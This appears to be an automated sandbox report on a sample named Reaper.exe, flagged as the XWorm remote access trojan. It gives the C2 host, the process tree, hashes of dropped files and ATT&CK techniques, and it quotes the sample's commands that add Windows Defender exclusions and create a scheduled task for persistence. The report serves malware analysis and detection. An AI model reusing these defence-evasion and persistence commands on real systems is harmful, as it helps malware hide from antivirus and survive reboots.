Resubmissions

20-04-2024 17:13

240420-vrrwwadh2z 10

12-03-2024 21:36

240312-1f3f5adc57 10

10-03-2024 04:41

240310-fbmjwscd28 10

10-03-2024 04:40

240310-fan2bscc93 10

10-03-2024 04:38

240310-e9wd1scc82 10

09-03-2024 07:38

240309-jghpnsdh88 10

Analysis

  • max time kernel
    124s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    12-03-2024 21:36

General

  • Target

    Reaper/Reaper/Reaper.exe

  • Size

    8.3MB

  • MD5

    79d145e3962e71bf725d15b4c0261dac

  • SHA1

    bc9d7a5a347fcefe3b3b81136e83af294bd489f4

  • SHA256

    0ca306be254d1b3aff02ae559e5649e9f0bb10367f692e132d7da39e6860448d

  • SHA512

    2fc3cd1b4542de7313ffea8fc16132df9c305c9ca847d4754e3a645c274933b4dd9682b4dd2585c62e5b8b2307e296fb64e32b758222123bb5c901a95ba0b6df

  • SSDEEP

    196608:wfojS3EHCg1OgwII+XN6h5BOpEAyRHtt7fEiLrArrIx2j1:wojS3E1zg+XN05UpEAcHtt7MiorGg

Malware Config

Extracted

Family

xworm

C2

l838.ddns.net:3232

Attributes
  • Install_directory

    %AppData%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 13 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe
    "C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAbABqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2144
    • C:\Users\Admin\AppData\Local\Temp\Reaper.exe
      "C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2752
    • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      "C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
        "C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2792
    • C:\Windows\Runtime broker.exe
      "C:\Windows\Runtime broker.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Runtime broker.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime broker.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Runtime Broker.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:684
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"
        3⤵
        • Creates scheduled task(s)
        PID:952
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {966C3AB3-0944-416F-8FCB-7DF24977D021} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
    1⤵
      PID:2480

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Scheduled Task/Job

    1
    T1053

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\_MEI26642\api-ms-win-core-localization-l1-2-0.dll
      Filesize

      15KB

      MD5

      946b6834271543c2bf51ec8844aa5253

      SHA1

      69017dadf33e099da04350c2733479759d5a8cae

      SHA256

      9d4caef81cfa17a92d17f4f412bec75f02c3f36c746c3736374f1bc51ce17154

      SHA512

      b8bf7d3cac6620bb6985e374b7c676ab69401c552d15ad80e527bc791d8da73eea5c5f78cf6da6a20640ce5a63349370c30e2560a0daae8ce4382f1ad39d939c

    • C:\Users\Admin\AppData\Local\Temp\_MEI26642\api-ms-win-core-processthreads-l1-1-1.dll
      Filesize

      13KB

      MD5

      4efc47ca2d7ccd126d48ef7d1215cb3b

      SHA1

      1071b4606191d294851eb61b3674cd65e5b7aeca

      SHA256

      f898b6033ed993a1d83d095befa6f045e8823d13469000d755496ec2ff5cc50f

      SHA512

      c8bcb3e890d10ff5902b233bce8f1ce277e0bf9fcd1f38f7f91f0d2f6a9b3d039016914d44cd860ea8a05d50af048fb2f60e5848b3fdf056785c7cf8694e0521

    • C:\Users\Admin\AppData\Local\Temp\_MEI26642\api-ms-win-core-timezone-l1-1-0.dll
      Filesize

      13KB

      MD5

      b47ebdd6d53056c8f47766952ea44d1d

      SHA1

      7e687c1f75205ae7154a03d7a07ad8b2e3962432

      SHA256

      73ceaaa0c05aa62f8629ab074eece8096f2069c772677763c0d85dbf58b06a4d

      SHA512

      c1517a5cf5a58be9d5cc6b35bfb66d63fafdaa18f62f74a29f1d50fb36261676c00eba6c33f4cac545908ec4d998163fc7f8d59397e5ec044a3284efb612b8b7

    • C:\Users\Admin\AppData\Local\Temp\_MEI26642\python311.dll
      Filesize

      1.6MB

      MD5

      5792adeab1e4414e0129ce7a228eb8b8

      SHA1

      e9f022e687b6d88d20ee96d9509f82e916b9ee8c

      SHA256

      7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967

      SHA512

      c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

    • C:\Users\Admin\AppData\Local\Temp\_MEI26642\ucrtbase.dll
      Filesize

      987KB

      MD5

      a4781a4c41ada12c5420ee2b9bcbfda3

      SHA1

      7c394165fafd176908f38c6c5ffe065751b6a868

      SHA256

      0ef5cc705f0752489ea8f2a79116ca842142cee9f2bbb60ef24e2524b0066a09

      SHA512

      0055a67d02c59d5f63a3d7b56fe934ae56a80fc56e11819de62ae567fca74724ac6bc885bac37cd3f11a7abd243b9990f8edd674becd7b7a4f89a3325ebab104

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E5O4H8RW8CQK6OXJTOHL.temp
      Filesize

      7KB

      MD5

      3bbb9c633a3afdc3dd95c57a7ea91b03

      SHA1

      b2d7d03d102c02382f1344f545ad9ff5d7c8fe14

      SHA256

      b37b6b44feecedc0314c3c402cab70fdaa977ac649e728b5894cf252e9c152cb

      SHA512

      87c970ced0505f058696ddb7779e661aa5015012733ad75e2363b6b3632ca15656f63897f243d6008cbb66e76d2018bd29a59de6f284c7a03bd5fa37d575d14b

    • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      Filesize

      6.4MB

      MD5

      a5f518954af2a1963bf62f93600361b2

      SHA1

      e7418791d326074c84527057b5e49564e8877fcb

      SHA256

      bf7e6295b8f2790e57850c6d8a5f80fc0562a5696f252553fd7439cbac57d6f4

      SHA512

      a3681ec7974ec8e59e4fc4a50c132ff75a01d02f82571c852c55a273dd87e62af7ff64b59a4d4d1e5c95df54f1fcec1d89e4ac501b584fce01bb24555eec49f0

    • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      Filesize

      5.4MB

      MD5

      2cbcf97fd1980155c2e3301ac39ecfe2

      SHA1

      a77f630855bb8fb2d7d2a52603b20fdb434ec4f9

      SHA256

      713a5ebbf69ec21df2bc29545095fa09127735432d40d548b42c16fe45c75659

      SHA512

      ba680f29e240df091d554990087b18130cf8cdb416a5b2fd7642fe1fbade9705c6d8bacd460167d78ca9f475b42b205d78d42fcdd7e873ceff16792e9559b3b5

    • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      Filesize

      3.8MB

      MD5

      175614a46dab17ce1846b01985f4f194

      SHA1

      20f2ac418af0b5ed3226f1a1e4fda532405c8817

      SHA256

      d1391410a494c340650f9092941fc2a2514c515e83a52dd334842c79dc88fa94

      SHA512

      5d7b127a443c615499b184930f7c77fec17e19a6caca5f0952690812f24ee3f34ee0451f0fed77d9ce298c24ca20d13da28f3f84a28145b6ea98cd44365625bd

    • C:\Windows\Runtime broker.exe
      Filesize

      80KB

      MD5

      4de8d786d98e91b729b922d851ffb999

      SHA1

      0d201186b3749418cf83f047cda5f3933cae6178

      SHA256

      2b2cccac0931eedf03f91f48d012f993c9577ed554fdef8cd300438510feaff5

      SHA512

      8b921c96dc50a54b34c0ece345c399be84174969e46877d4b105c31931953bcd8879c85c38f19ef6d10da7882e4c10a9834386f7f34a014385d9c70312bbf13c

    • \Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll
      Filesize

      323KB

      MD5

      8610f4d3cdc6cc50022feddced9fdaeb

      SHA1

      4b60b87fd696b02d7fce38325c7adfc9e806f650

      SHA256

      ac926c92ccfc3789a5ae571cc4415eb1897d500a79604d8495241c19acdf01b9

      SHA512

      693d1af1f89470eab659b4747fe344836affa0af8485b0c0635e2519815e5a498f4618ea08db9dcf421aac1069a04616046207ee05b9ed66c0a1c4a8f0bddd09

    • \Users\Admin\AppData\Local\Temp\Reaper.exe
      Filesize

      42KB

      MD5

      c7d407dbbe4d83fc37f2fa4f51276c76

      SHA1

      c6f1f596be6a99566d5862a0aa2f16b90eecb05c

      SHA256

      fc69c7aee21fa012c9e9de28e35c20eb9ddf473c0ac0b482faebc203dd97999c

      SHA512

      ed49a442172bdadd6f91db48db3003c5cb749868e9c40a90e8f6b65cdf4b6899d0132cfd70fb08a248412118353d0b4477606385244b90e0883ecdda213403c5

    • \Users\Admin\AppData\Local\Temp\_MEI26642\api-ms-win-core-file-l1-2-0.dll
      Filesize

      13KB

      MD5

      c0a08223267dca75cc2b59d44d58f7bd

      SHA1

      bc78b24084e11a8a81976f65b2c6ac51fee0ad6d

      SHA256

      7f7aa25f8cf3a6ad223075158ffadecdbb2113f199e78bd96c90e59575c02533

      SHA512

      ce78534e2f022806093547dca1a46995ac9677bc05aaa41718a91b2b68a8efd30e0612a721c4e8e0a4e5abce558bb7a6e24a5430b74885d770a5119293b3b145

    • \Users\Admin\AppData\Local\Temp\_MEI26642\api-ms-win-core-file-l2-1-0.dll
      Filesize

      13KB

      MD5

      756d1bce2c2fc7e527e48247fd8b3ef4

      SHA1

      66b26444d249277bbaed0d7f487618795fe91ef4

      SHA256

      11a86edc5ca1d6a83c1d8709f8c3e69d9a1ff763ba85fecd49adb6647ba0e9a5

      SHA512

      78e5bb42ce8cff66f0e58d865faed881d1b9214ca1470276beeb0a7810d5926776e0121f5dbbd7a7f01d0b5ed0a8c0ec57112fcd6fdd45d7a19f39311a2469ac

    • \Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      Filesize

      7.8MB

      MD5

      69d5b0d4d9bb2fbbf840b97c802def96

      SHA1

      18420ab2e4e873c38b5563d7a07517c46525a62b

      SHA256

      08b995c990a12834a7712dd237ea2efa85762ac21bb6752c4453381531061a95

      SHA512

      35c0bdc92630766f857b9770aea12398d8dcc408ff6d2f2a182acab7c3ec9ff0c1cb7bcb243c2c007d62c30e6e595effcd62b2bc046ae98752c2901cc7bacc49

    • \Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      Filesize

      4.9MB

      MD5

      c6c0c084f158d5cdc4aea52d88021b1c

      SHA1

      0e7ca1d127a3ca301f25a11e36033bdf4193c432

      SHA256

      8b3840af093cd83f1a50c25f6fdd8a0c1db2aca4bf6355e53c0acb00e1c2e311

      SHA512

      33f96b0d4d2289220e7cb073610dabab5489e4a718e904b74fa8845a7d5d871d6b0cfc0013d9c65734b932e18ad34b8705ef1761344785bd56fb90fdd5d9ef62

    • \Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      Filesize

      5.1MB

      MD5

      08d2eaab95450f5a986f28b35d32d227

      SHA1

      3322eee4b593a96277b29c38dea64ccc93c4b1fa

      SHA256

      f3b08761145514fb71211cbe1736665b52fdf7fddc603ace7d94f0329b3ea507

      SHA512

      21ee98b66347cf5b838e317c1a35489efd988f4d0fb2d4e6fe15a0f406d637019e7e547b6ccb328310a3d668c21e45718ade2c83fb24aacd2a93c599eb81132a

    • \Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      Filesize

      4.9MB

      MD5

      2fa6c13cd2d7864d398e2e8d09764763

      SHA1

      20765cae2dbad5143ab499b4653e59523e079ffd

      SHA256

      789683d3b34fec6e53c38ef6cefc1c47a8f533ec0fcba3534adfd39eeccc2385

      SHA512

      4b326b5687d9bd153bd3d5810a81bd23d7007029efbccf6425bcf8fc2904c85d1f361333eef3ec51dd99bce70bdc974eea4c9a9186443176f7b446ae3780bfe0

    • memory/684-162-0x000007FEEDC50000-0x000007FEEE5ED000-memory.dmp
      Filesize

      9.6MB

    • memory/684-163-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/684-164-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/684-165-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/684-161-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/684-160-0x000007FEEDC50000-0x000007FEEE5ED000-memory.dmp
      Filesize

      9.6MB

    • memory/684-166-0x000007FEEDC50000-0x000007FEEE5ED000-memory.dmp
      Filesize

      9.6MB

    • memory/720-149-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp
      Filesize

      9.6MB

    • memory/720-152-0x0000000002C4B000-0x0000000002CB2000-memory.dmp
      Filesize

      412KB

    • memory/720-150-0x0000000002C40000-0x0000000002CC0000-memory.dmp
      Filesize

      512KB

    • memory/720-151-0x0000000002C44000-0x0000000002C47000-memory.dmp
      Filesize

      12KB

    • memory/720-154-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp
      Filesize

      9.6MB

    • memory/720-148-0x0000000002C40000-0x0000000002CC0000-memory.dmp
      Filesize

      512KB

    • memory/720-146-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp
      Filesize

      9.6MB

    • memory/1640-120-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp
      Filesize

      9.6MB

    • memory/1640-118-0x000000001B580000-0x000000001B862000-memory.dmp
      Filesize

      2.9MB

    • memory/1640-122-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp
      Filesize

      9.6MB

    • memory/1640-124-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/1640-123-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/1640-125-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/1640-126-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp
      Filesize

      9.6MB

    • memory/1640-119-0x00000000027F0000-0x00000000027F8000-memory.dmp
      Filesize

      32KB

    • memory/1640-121-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/2144-86-0x00000000005A0000-0x00000000005E0000-memory.dmp
      Filesize

      256KB

    • memory/2144-108-0x00000000005A0000-0x00000000005E0000-memory.dmp
      Filesize

      256KB

    • memory/2144-109-0x0000000073FF0000-0x000000007459B000-memory.dmp
      Filesize

      5.7MB

    • memory/2144-111-0x0000000073FF0000-0x000000007459B000-memory.dmp
      Filesize

      5.7MB

    • memory/2144-107-0x00000000005A0000-0x00000000005E0000-memory.dmp
      Filesize

      256KB

    • memory/2144-101-0x0000000073FF0000-0x000000007459B000-memory.dmp
      Filesize

      5.7MB

    • memory/2752-147-0x0000000073480000-0x0000000073B6E000-memory.dmp
      Filesize

      6.9MB

    • memory/2752-18-0x0000000001290000-0x00000000012A0000-memory.dmp
      Filesize

      64KB

    • memory/2752-82-0x0000000073480000-0x0000000073B6E000-memory.dmp
      Filesize

      6.9MB

    • memory/2752-112-0x0000000004CD0000-0x0000000004D10000-memory.dmp
      Filesize

      256KB

    • memory/2752-105-0x0000000000690000-0x00000000006E8000-memory.dmp
      Filesize

      352KB

    • memory/2792-110-0x000007FEF3E20000-0x000007FEF4409000-memory.dmp
      Filesize

      5.9MB

    • memory/2872-106-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp
      Filesize

      9.9MB

    • memory/2872-113-0x000000001B4D0000-0x000000001B550000-memory.dmp
      Filesize

      512KB

    • memory/2872-172-0x000000001B4D0000-0x000000001B550000-memory.dmp
      Filesize

      512KB

    • memory/2872-153-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp
      Filesize

      9.9MB

    • memory/2872-87-0x0000000001050000-0x000000000106A000-memory.dmp
      Filesize

      104KB

    • memory/2892-137-0x0000000002CF0000-0x0000000002D70000-memory.dmp
      Filesize

      512KB

    • memory/2892-135-0x0000000002CF0000-0x0000000002D70000-memory.dmp
      Filesize

      512KB

    • memory/2892-133-0x0000000002860000-0x0000000002868000-memory.dmp
      Filesize

      32KB

    • memory/2892-134-0x000007FEEDC50000-0x000007FEEE5ED000-memory.dmp
      Filesize

      9.6MB

    • memory/2892-136-0x000007FEEDC50000-0x000007FEEE5ED000-memory.dmp
      Filesize

      9.6MB

    • memory/2892-132-0x000000001B550000-0x000000001B832000-memory.dmp
      Filesize

      2.9MB

    • memory/2892-140-0x000007FEEDC50000-0x000007FEEE5ED000-memory.dmp
      Filesize

      9.6MB

    • memory/2892-138-0x0000000002CF0000-0x0000000002D70000-memory.dmp
      Filesize

      512KB

    • memory/2892-139-0x0000000002CF0000-0x0000000002D70000-memory.dmp
      Filesize

      512KB